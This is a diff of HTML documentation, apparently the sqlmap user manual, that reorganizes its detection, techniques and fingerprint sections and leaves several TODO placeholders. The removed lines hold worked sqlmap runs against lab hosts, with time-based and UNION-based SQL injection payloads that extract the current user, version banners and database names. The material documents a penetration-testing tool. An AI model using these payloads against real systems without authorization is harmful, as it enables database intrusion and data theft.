+<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Detection</A>
+</H2>
+
+<P>These options can be used to specify how to parse and compare page content
+from HTTP responses when using blind SQL injection technique.</P>
+
+
+<H3>Level</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-level</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Risk</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-risk</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>TODO: Page comparison</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-string</CODE> and <CODE>-</CODE><CODE>-regexp</CODE></P>
 
 <P>By default the distinction of a True query by a False one (basic concept
 for Inferential blind SQL injection attacks) is done comparing injected
@@ -2131,87 +1695,6 @@ which string or regular expression match is on not injected and True page
 only.
 This way the distinction will be based upon string presence or regular
 expression match and not page MD5 hash comparison.</P>
-<P>Example on a <B>MySQL 5.0.67</B> target on a page which content changes
-every second due to a call to PHP function <CODE>time()</CODE>:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  -v 5
-
-[...]
-[hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:50] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 172.16.213.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:50 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Connection: close
-Transfer-Encoding: chunked
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996190&lt;/p&gt;
-
-[hh:mm:51] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 172.16.213.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:51 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 161
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996191&lt;/p&gt;
-
-[hh:mm:51] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 172.16.213.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:51 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 161
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996191&lt;/p&gt;
-
-[hh:mm:51] [ERROR] url is not stable, try with --string or --regexp options, refer to 
-the user's manual paragraph 'Page comparison' for details
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
 
 <P>As you can see, the string after <CODE>Dynamic content</CODE> changes its
 value every second. In the example it is just a call to PHP
@@ -2225,60 +1708,9 @@ on the not injected page content and it is not on the False page content
 (because the query condition returns no output so <CODE>luther</CODE> is not
 displayed on the page content) and passing it to sqlmap, you are able to
 inject anyway.</P>
-<P>Example on a <B>MySQL 5.0.67</B> target on a page which content changes
-every second due to a call to PHP function <CODE>time()</CODE>:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  --string "luther" -v 1
-
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the provided string is within the target URL page content
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
 
 <P>You can also specify a regular expression to match rather than a string if
 you prefer.</P>
-<P>Example on a <B>MySQL 5.0.67</B> target on a page which content changes
-every second due to a call to PHP function <CODE>time()</CODE>:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  --regexp "&lt;td>lu[\w][\w]er" -v 1
-
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the provided regular expression matches within the target 
-URL page content
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
 
 <P>As you can see, when one of these options is specified, sqlmap skips the
 URL stability test.</P>
@@ -2288,441 +1720,40 @@ with content that changes itself at each refresh without modifying the
 user's input</B>.</P>
 
 
-<H3>Exclude specific page content</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-excl-str</CODE> and <CODE>-</CODE><CODE>-excl-reg</CODE></P>
-
-<P>Another way to get around the dynamicity issue explained above is to exclude
-the dynamic part from the page content before processing it.</P>
-
-<P>As you see in the above example the number after <CODE>Dynamic content: </CODE>
-was dynamic and changed each second. To get around of this problem we could
-use the above explained page comparison options or exclude this snippet of
-dynamic text from the page before processing it and comparing it with the
-not injected page.</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  --excl-reg "Dynamic content: ([\d]+)"
-
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, when this options is specified, sqlmap skips the URL
-stability test.</P>
-
-
-<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Techniques</A>
+<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Techniques</A>
 </H2>
 
-<P>These options can be used to test for specific SQL injection technique or
-to use one of them to exploit the affected parameter(s) rather than using
-the default blind SQL injection technique.</P>
+<P>These options can be used to tweak how specific SQL injection techniques
+are tested.</P>
 
-<H3>Test for stacked queries (multiple statements) support</H3>
+<H3>Seconds to delay the DBMS response for time-based blind SQL injection</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-stacked-test</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-time-sec</CODE></P>
 
-<P>It is possible to test if the web application technology supports
-<B>stacked queries</B>, multiple statements, on the injectable
-parameter.</P>
+<P>It is possible to set the seconds to delay the response when testing for
+time-based blind SQL injection, by providing the
+<CODE>-</CODE><CODE>-time-sec</CODE> option followed by an integer.
+By default delay is set to <B>5 seconds</B>.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
-  --stacked-test -v 1
+<H3>TODO</H3>
 
-[...]
-back-end DBMS: MySQL >= 5.0.0
+<P>Switch: <CODE>-</CODE><CODE>-union-cols</CODE></P>
 
-[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
-stacked queries support:        None
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>TODO</P>
 
-<P>By default PHP builtin function <CODE>mysql_query()</CODE> does not support
-multiple statements.
-Multiple statements is a feature supported by default only by some
-web application technologies in relation to the back-end database
-management system. For instance, as you can see from the next example,
-where PHP does not support them on MySQL, it does on PostgreSQL.</P>
+<H3>TODO</H3>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
-  --stacked-test -v 1
+<P>Switch: <CODE>-</CODE><CODE>-union-char</CODE></P>
 
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
-stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
-  --stacked-test -v 1
-
-[...]
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
-stacked queries support:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>TODO</P>
 
 
-<H3>Test for time based blind SQL injection</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-time-test</CODE> and <CODE>-</CODE><CODE>-time-sec</CODE></P>
-
-<P>It is possible to test if the target URL is affected by a <B>time based
-blind SQL injection</B> vulnerability.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND 
-condition syntax
-[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection 
-with AND condition syntax
-time based blind sql injection payload:    'id=1 AND SLEEP(5) AND 5249=5249'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND 
-condition syntax
-[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql 
-injection with AND condition syntax
-[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked 
-query syntax
-[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection 
-with stacked query syntax
-time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with AND 
-condition syntax
-[hh:mm:59] [WARNING] the parameter 'name' is not affected by a time based blind sql 
-injection with AND condition syntax
-[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked 
-query syntax
-[hh:mm:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with 
-stacked query syntax
-time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 
-'PmrXn'='PmrXn'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>It is also possible to set the seconds to delay the response by providing
-the <CODE>-</CODE><CODE>-time-sec</CODE> option followed by an integer. By default delay
-is set to five seconds.</P>
-
-
-<H3>Test for UNION query SQL injection</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-union-test</CODE> and <CODE>-</CODE><CODE>-union-tech</CODE></P>
-
-<P>It is possible to test if the target URL is affected by a <B>UNION query
-(inband) SQL injection</B> vulnerability.
-Refer to the <EM>Techniques</EM> section for details on this SQL injection
-technique.</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>By default sqlmap uses the <B><CODE>NULL</CODE> bruteforcing</B> technique to
-detect the number of columns within the original <CODE>SELECT</CODE> statement.
-It is also possible to change it to <B><CODE>ORDER BY</CODE> clause
-bruteforcing</B> with the <CODE>-</CODE><CODE>-union-tech</CODE> option.</P>
-
-<P>Further details on these techniques can be found 
-<A HREF="http://bernardodamele.blogspot.com/2007/07/insight-on-union-query-sql-injection.html">here</A>.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_str.php?id=1" \
-  --union-test --union-tech orderby -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
-bruteforcing technique
-[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://172.16.213.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
-1262=1262'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
-exploitable by the inband SQL injection technique.
-In case a case it is strongly recommended to use this technique which saves
-a lot of time.</P>
-
-<P>It is strongly recommended to run at least once sqlmap with the
-<CODE>-</CODE><CODE>-union-test</CODE> option to test if the affected parameter is used
-within a <CODE>for</CODE> cycle, or similar, and in case use
-<CODE>-</CODE><CODE>-union-use</CODE> option to exploit this vulnerability because it
-saves a lot of time and it does not weight down the web server log file
-with hundreds of HTTP requests.</P>
-
-
-<H3>Use the UNION query SQL injection</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-union-use</CODE></P>
-
-<P>Providing the <CODE>-</CODE><CODE>-union-use</CODE> parameter, sqlmap will first test if
-the target URL is affected by an <B>inband SQL injection</B>
-(<CODE>-</CODE><CODE>-union-test</CODE>) vulnerability then, in case it seems to be
-vulnerable, it will confirm that the parameter is affected by a <B>Full
-UNION query SQL injection</B> and use this technique to go ahead with the
-exploiting.
-If the confirmation fails, it will check if the parameter is affected by
-a <B>Partial UNION query SQL injection</B>, then use it to go ahead if it
-is vulnerable.
-In case the inband SQL injection vulnerability is not exploitable, sqlmap
-will automatically fallback on the blind SQL injection technique to go
-ahead.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 \
-  --union-use --banner
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
-vulnerability
-[hh:mm:42] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [DEBUG] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
-blind SQL injection and exploitable full inband SQL injection
-vulnerabilities.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5 \
-  --union-use --current-user
-
-[...]
-[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
-IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), 
-NULL# AND 8032=8032
-[hh:mm:29] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112
-%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29
-%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
-%208032=8032 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Tue, 16 Dec 2008 hh:mm:29 GMT
-Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9 
-OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
-X-Powered-By: PHP/5.2.6-2ubuntu4
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;pnyMXVtestuser@localhostHYKMyg&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;
-
-[hh:mm:29] [DEBUG] performed 3 queries in 0 seconds
-current user:    'testuser@localhost'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the MySQL <CODE>CURRENT_USER()</CODE> function (--current-user)
-output is nested, inband, within the HTTP response page, this makes the
-inband SQL injection exploited.</P>
-
-<P>In case the inband SQL injection is not fully exploitable, sqlmap will
-check if it is partially exploitable: this occurs if the query output
-is not parsed within a <CODE>for</CODE>, or similar, cycle but only the first
-entry is displayed in the page content.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_partialunion.php?id=1" -v 2 \
-  --union-use --dbs
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:56] [INFO] fetching database names
-[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
-[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection 
-vulnerability
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
-IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL 
-FROM information_schema.SCHEMATA# AND 1062=1062
-[hh:mm:56] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:56] [INFO] the SQL query provided returns 4 entries
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
-[hh:mm:56] [DEBUG] performed 7 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
-[hh:mm:56] [DEBUG] performed 8 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
-[hh:mm:56] [DEBUG] performed 9 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
-[hh:mm:56] [DEBUG] performed 10 queries in 0 seconds
-available databases [4]:
-[*] information_schema
-[*] mysql
-[*] privatedb
-[*] testdb
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, sqlmap identified that the parameter is affected by a
-partial inband SQL injection. Consequently, it counted the number of query
-output entries and retrieved them once per time. It forces the parameter
-(<CODE>id</CODE>) value <CODE>1</CODE> to its negative value <CODE>-1</CODE> so that
-it does not return, presumibly, any output. That leaves our own <CODE>UNION ALL
-SELECT</CODE> statement to produce one entry at a time and display only it in 
-the page content.</P>
-
-
-<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Fingerprint</A>
+<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Fingerprint</A>
 </H2>
 
-<H3>Extensive database management system fingerprint</H3>
+<H3>TODO: Extensive database management system fingerprint</H3>
 
-<P>Options: <CODE>-f</CODE> or <CODE>-</CODE><CODE>-fingerprint</CODE></P>
+<P>Switches: <CODE>-f</CODE> or <CODE>-</CODE><CODE>-fingerprint</CODE></P>
 
 <P>By default the web application's back-end database management system
 fingerprint is performed requesting a database specific function which
@@ -2735,24 +1766,6 @@ back-end DBMS is also tested.</P>
 database management system and go ahead with the injection with its
 specific syntax within the limits of the database architecture.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
-
-[...]
-[hh:mm:17] [INFO] testing MySQL
-[hh:mm:17] [INFO] confirming MySQL
-[hh:mm:17] [INFO] retrieved: 5
-[hh:mm:17] [INFO] the back-end DBMS is MySQL
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>As you can see, sqlmap automatically fingerprints the web server operating
 system and the web application technology by parsing some HTTP response headers.</P>
 
@@ -2760,218 +1773,16 @@ system and the web application technology by parsing some HTTP response headers.
 based on various techniques like specific SQL dialects and inband error
 messages, you can  provide the <CODE>-</CODE><CODE>-fingerprint</CODE> option.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:49] [INFO] testing MySQL
-[hh:mm:49] [INFO] confirming MySQL
-[hh:mm:49] [INFO] retrieved: 3
-[hh:mm:49] [INFO] the back-end DBMS is MySQL
-[hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] retrieved: t
-[hh:mm:49] [INFO] executing MySQL comment injection fingerprint
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: active fingerprint: MySQL >= 5.0.38 and &lt; 5.1.2
-               comment injection fingerprint: MySQL 5.0.67
-               html error message fingerprint: MySQL
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:38] [WARNING] the back-end DMBS is not MySQL
-[hh:mm:38] [INFO] testing Oracle
-[hh:mm:38] [INFO] confirming Oracle
-[hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] retrieved: 10
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
